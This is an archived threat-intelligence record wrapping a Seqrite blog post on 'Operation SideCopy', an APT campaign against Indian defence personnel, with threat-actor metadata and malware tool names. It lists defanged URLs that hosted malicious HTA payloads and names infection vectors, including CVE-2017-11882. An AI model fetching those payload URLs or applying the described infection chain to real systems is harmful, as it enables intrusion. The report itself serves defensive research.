{ "id": "2e4ac937-a6a5-4158-a63e-fc1779dff5b9", "created_at": "2026-04-06T00:21:02.003123Z", "updated_at": "2026-04-10T13:11:46.742543Z", "deleted_at": null, "sha1_hash": "4003f82d709155be4c5af42b8386846aca091747", "title": "Operation SideCopy!", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 818248, "plain_text": "Operation SideCopy!\r\nBy Kalpesh Mantri\r\nPublished: 2020-09-23 · Archived: 2026-04-05 12:37:23 UTC\r\n23 September 2020\r\nAn insight into Transparent Tribe’s sub-division which has been incorrectly attributed for years.\r\nIntroduction\r\nQuick Heal’s threat intelligence team recently uncovered evidence of an advanced persistent threat (APT) against\r\nIndian defence forces. Our analysis shows that many old campaigns and attack in the past one year relate to\r\n‘Operation SideCopy’ by common IOCs.\r\nKey Findings\r\nOperation SideCopy is active from early 2019, till date.\r\nThis cyber-operation has been only targeting Indian defence forces and armed forces personnel.\r\nMalware modules seen are constantly under development and updated modules are released after a\r\nreconnaissance of victim data.\r\nActors are keeping track of malware detections and updating modules when detected by AV.\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 1 of 5\n\nAlmost all CnC belongs to Contabo GmbH and server names are similar to machine names found in the\r\nTransparent Tribe report.\r\nThis threat actor is misleading the security community by copying TTPs that point at Sidewinder APT\r\ngroup.\r\nWe suspect this threat actor has links with Transparent Tribe APT group.\r\nSummary:\r\nA few months ago, Quick Heal’s Next-Gen Behavioural Detection system alerted on a few processes executing\r\nHTA from some non-reputed websites.\r\nWe have made a list of URLs, connected from mshta.exe, across multiple customers:\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Armed-Forces-Spl-Allowance-Order/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Defence-Production-Policy-2020/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Images/8534\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/IncidentReport/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/ParaMil-Forces-Spl-Allowance-Order/html/\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Req-Data/html\r\nhxxps://demo[.]smart-hospital[.]in/uploads/staff_documents/19/Sheet_Roll/html\r\nhxxps://demo[.]smart-school[.]in/uploads/staff_documents/9/Sheet_Roll/html\r\nhxxps://demo[.]smart-school[.]in/uploads/student_documents/12/css/\r\nhxxps://drivetoshare[.]com/mod[.]gov[.]in_dod_sites_default_files_Revisedrates/html\r\nThe highlighted ones were sent to targets across Indian defence units and armed forces individuals.\r\nWe started tracking this campaign as it was targeting critical Indian organizations.\r\nTraces of this operation can be tracked from early 2019 till date. Till now, we have observed 3 infection chain\r\nprocess.\r\nInitial infection vector in two of the chains was LNK file, that came from a malspam. But in one case, we saw\r\nattackers making use of template injection attack and equation editor vulnerability (CVE-2017-11882) as the\r\ninitial infection vector. Though the initial infection vector is different in the third case, the final payload is similar\r\nto the first two chains.\r\nBelow images will provide an overview of malware infection in victim machines.\r\nInfection Chain – Version 1:\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 2 of 5\n\nInfection Chain – Version 2:\r\nInfection Chain – Version 3:\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 3 of 5\n\nWe have provided an in-depth analysis of each of this module in our latest report which can be found here.\r\nThe background and analysis in this paper provide complete forensic and useful details of our current thinking on\r\nthe use of malware in this operation. We have provided all factors that lead to our attribution.\r\nSubject matter experts:\r\nKalpesh Mantri, Principal Security Researcher\r\nPawan Chaudhari, Threat Research Scientist\r\nGoutam Tripathy, Senior Security Researcher\r\n Previous PostCould you be blindsided when your CEO emails you?\r\nNext Post  The return of the Emotet as the world unlocks!\r\nKalpesh Mantri is currently working as a Principal Security Researcher with Quick Heal Labs. He is currently\r\nworking on hunting APTs and telemetry...\r\nArticles by Kalpesh Mantri »\r\nRelated Posts\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 4 of 5\n\nSource: https://www.seqrite.com/blog/operation-sidecopy/\r\nhttps://www.seqrite.com/blog/operation-sidecopy/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.seqrite.com/blog/operation-sidecopy/" ], "report_names": [ "operation-sidecopy" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434862, "ts_updated_at": 1775826706, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.pdf", "text": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.txt", "img": "https://archive.orkl.eu/4003f82d709155be4c5af42b8386846aca091747.jpg" } }